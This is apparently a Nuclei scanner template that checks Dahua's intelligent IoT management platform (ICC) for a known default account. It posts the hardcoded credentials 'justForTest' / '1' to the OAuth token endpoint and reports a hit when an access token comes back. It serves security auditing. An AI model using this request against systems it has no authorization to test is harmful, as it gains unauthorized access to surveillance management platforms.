id: dahua-icc-default-login

info:
  name: 大华智能物联综合管理平台默认口令
  author: SleepingBag945
  severity: high

http:
  - raw:
      - |
        POST /evo-apigw/evo-oauth/oauth/token HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
        Content-Type: application/x-www-form-urlencoded
        Accept-Encoding: gzip

        username=justForTest&password=1&grant_type=password&client_id=web_client&client_secret=web_client&public_key=


    matchers:
      - type: dsl
        dsl:
          - contains_all(body,"access_token","token_type","expires_in") && status_code == 200